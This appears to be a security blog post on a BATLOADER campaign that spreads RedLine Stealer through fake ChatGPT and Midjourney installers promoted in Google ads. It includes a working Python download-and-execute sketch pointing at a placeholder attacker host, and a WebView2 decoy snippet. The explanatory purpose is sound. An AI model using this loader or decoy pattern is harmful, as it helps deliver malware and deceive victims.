Introduction:
Malicious actors are taking advantage of the popularity of generative AI services, such as OpenAI ChatGPT and Midjourney, by using deceptive Google Search ads. These ads are part of a BATLOADER campaign designed to distribute the RedLine Stealer malware. The lack of first-party standalone apps for these AI services has created an opportunity for threat actors to redirect users to fake websites promoting counterfeit applications. This blog post explores the tactics employed by the attackers and the potential risks associated with these malicious ads.
BATLOADER Campaign Exploiting AI Services:
The BATLOADER campaign lures victims through rogue Google Search ads that kick off drive-by downloads of the loader malware. Clicking on one of these ads redirects the user to a fake landing page hosting the installer. The installer bundles an executable file (ChatGPT.exe or midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads and loads RedLine Stealer from a remote server.
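To make the delivery chain concrete, the sketch below illustrates the generic fetch-and-run pattern such a downloader stage performs. It is written in Python purely for illustration; the campaign's actual stage is the PowerShell script named above, and the URL and file names here are hypothetical placeholders.

# Conceptual sketch of the fetch-and-run pattern described above.
# The real campaign uses a PowerShell stage (Chat.ps1 / Chat-Ready.ps1);
# the URL and file names below are hypothetical placeholders.
import subprocess
import tempfile
import urllib.request
from pathlib import Path

PAYLOAD_URL = "https://attacker-controlled.example/payload.bin"  # hypothetical

def fetch_and_run(url: str) -> None:
    """Download a second-stage payload to a temporary directory and launch it."""
    staging_dir = Path(tempfile.mkdtemp(prefix="stage_"))
    payload_path = staging_dir / "payload.exe"
    urllib.request.urlretrieve(url, payload_path)  # pull the payload from the remote server
    subprocess.Popen([str(payload_path)])          # hand off execution to the downloaded binary

if __name__ == "__main__":
    fetch_and_run(PAYLOAD_URL)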
Clever Redirection Techniques:
To avoid detection, the bundled executable uses the Microsoft Edge WebView2 runtime to load a legitimate URL, chat.openai.com or www.midjourney.com, in a pop-up window. This strategy tricks users into believing they are interacting with the authentic ChatGPT or Midjourney interface, minimizing suspicion.
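The decoy is simple to reproduce in principle. The sketch below, again in Python and using the third-party pywebview package rather than the attackers' tooling, opens the genuine chat.openai.com in a native pop-up window rendered by the Edge WebView2 engine, which is why a victim sees the real ChatGPT interface even though the hosting program is something else entirely.

# Illustrative only: pywebview's 'edgechromium' backend renders pages via
# Microsoft Edge WebView2 on Windows. This is not the campaign's code; it
# simply shows how a native window can display the legitimate site.
import webview

if __name__ == "__main__":
    webview.create_window("ChatGPT", "https://chat.openai.com")
    webview.start(gui="edgechromium")  # request the WebView2-based backend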
Previous Exploitation and Google’s Response:
The exploitation of ChatGPT- and Midjourney-themed lures to distribute malware is not a new phenomenon. Earlier attacks capitalized on the AI trend to deploy Vidar Stealer and Ursnif. However, Google appears to have taken measures to curb the abuse of its Search ads, leading to a decline in their usage. The activity is part of a broader wave of phishing and scam campaigns seeking to exploit the rising popularity of AI tools to distribute malware and fraudulent applications.
Fleeceware Apps and Other Threats:
In addition to the BATLOADER campaign, there has been an increase in fleeceware apps related to ChatGPT on Google Play and the Apple App Store. These apps coerce users into unwanted subscriptions while skirting the boundaries of platform terms of service. Other cybersecurity vendors have also reported fraudulent look-alikes of the ChatGPT service that harvest credit card details, perpetrate credit card fraud, and steal Facebook account information.
Growing Concerns and Detection Efforts:
A surge in registrations of ChatGPT-related domains underscores how attractive these AI services have become to attackers. Security researchers have been working to identify and expose the phishing campaigns, JavaScript downloaders, and malware-as-a-service (MaaS) operations associated with these threats, and recent investigations have even revealed the identities of key operators behind some of them.
Conclusion:
Users of generative AI services like OpenAI ChatGPT and Midjourney must remain vigilant and cautious when encountering Google Search ads. The presence of malicious actors seeking to exploit these popular services highlights the need for heightened cybersecurity awareness. By understanding the risks and staying informed about ongoing threats, users can better protect themselves from malware, fake applications, and subscription scams.